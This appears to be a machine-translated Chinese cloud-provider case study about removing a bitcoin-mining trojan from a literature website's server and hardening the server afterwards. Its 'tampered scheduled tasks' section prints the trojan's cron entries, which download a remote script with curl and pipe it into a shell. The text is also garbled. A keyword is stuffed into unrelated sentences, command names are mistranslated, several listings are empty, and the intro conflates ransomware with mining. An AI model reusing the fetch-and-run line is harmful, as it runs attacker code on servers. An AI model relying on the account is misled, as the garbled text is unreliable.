异常的资源消耗是由于比特币挖矿木马造成的

自上周末以来，大规模网络勒索软件攻击迅速蔓延至全球100多个国家和地区。病毒锁定用户数据和电脑文件，要求用户支付价值300的比特币赎金-

600 美元。成为屏幕级新闻。

比特币是一种网络虚拟货币，主要以一组密码代码为基础，通过复杂的算法生成。任何人都可以下载并运行比特币客户端参与比特币的创造，这个过程也被恰当地称为“挖矿”。比特币“挖矿木马”是黑客通过木马控制大量肉鸡电脑为它们制造比特币的恶意程序。

                                   警方缴获的比特币“挖矿机”

在阿里云服务的客户中，也有被骗的。

北京新华先锋出版科技有限公司是一家专业从事图书策划、代理出版、营销推广的现代综合性文化产业机构。旗下北京酷读文化有限公司负责运营网络文学网站——酷读网拥有国内知名的网络作家，颇具影响力。

2016年11月，网站开始出现CPU和内存资源异常消耗，网站响应速度变慢，用户访问量没有明显变化。经技术团队多次排查处理比特币挖矿ip，故障仍未排除。新华先锋希望找到专业的运维人员，快速解决问题，恢复网站正常运行。

经过多次考察，最终选择了阿里云生态服务合作伙伴博为提供服务保障。通过技术诊断，发现该网站被“比特币挖矿木马”入侵。一些高级版本的木马病毒可以篡改Linux的基本命令，技术人员很难通过普通方法找到木马进程。技术人员需要结合运维经验、在线数据、用户故障时间点、系统日志分析等来定位问题。

新华先锋的特洛伊木马就是这种情况。黑客利用系统漏洞，通过网页脚本植入木马，窃取服务器资源进行比特币挖矿计算。博威技术人员通过下载木马脚本文件分析发现，木马修改了系统登录认证配置、定时任务，创建了数据接收处理的挖矿进程，同时伪造系统服务，充当守护进程。

l 被篡改的计划任务：

/10 * curl -fsSL |嘘

/1 * 根卷曲 -fs :8990/pm.sh |重击

l木马文件：

p>

l 木马守护进程：

l 被篡改的 SSH 配置：

p>

博维技术人员指导新华先锋完成数据备份比特币挖矿ip，清理木马进程和守护进程，恢复被篡改的配置文件和定时任务等，并在系统恢复正常后进行了一系列加固操作：缓存数据库Redis，IP绑定/密码验证/端口替换，ROOT登录限制/密码修改，Mysql，FTP，SSH端口替换，IPtable访问控制，阿里云ECS实例安全组IP/端口限制/快照备份。

幸运的是，木马只使用服务器资源进行计算，不会窃取或破坏用户数据。由于及时发现并查杀木马修复漏洞，避免了用户数据泄露、加密勒索等更严重的后果。

经过技术人员的故障排除和日常检查，目前用户系统运行正常。博维也一直为新华先锋提供7*24小时的运维支持，让新华先锋专注于自身业务，在文化出版领域展现实力。

如果您想了解更多生态伙伴提供的服务，

欢迎来到阿里云官网-支持-区域服务查看！链接：